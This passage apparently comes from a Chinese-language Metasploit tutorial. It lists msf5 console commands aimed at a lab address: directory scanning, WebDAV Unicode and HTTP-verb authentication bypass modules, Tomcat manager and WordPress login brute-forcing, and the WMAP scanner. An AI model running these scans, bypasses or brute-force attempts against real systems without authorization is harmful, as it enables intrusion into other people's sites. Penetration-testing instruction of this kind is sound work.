msf5 auxiliary(scanner/http/files_dir) > set rhosts 192.168.172.131
msf5 auxiliary(scanner/http/files_dir) > set threads 10
msf5 auxiliary(scanner/http/files_dir) > run
#### WebDAV Unicode 编码身份绕过
use auxiliary/scanner/http/dir_webdav_unicode_bypass
msf5 auxiliary(scanner/http/dir_webdav_unicode_bypass) > set rhosts 192.168.172.131
threads => 10
msf5 auxiliary(scanner/http/dir_webdav_unicode_bypass) > run
#### Tomcat 管理界面爆破
msf5 > use auxiliary/scanner/http/tomcat_mgr_login
#### 基于HTTP 方法(post)的身份绕过
msf5 > use auxiliary/scanner/http/verb_auth_bypass
#### WordPress CMS密码爆破(常用于个人网站)
msf5 > use auxiliary/scanner/http/wordpress_login_enum
### WMAP WEB 应用扫描器
msf5 > load wmap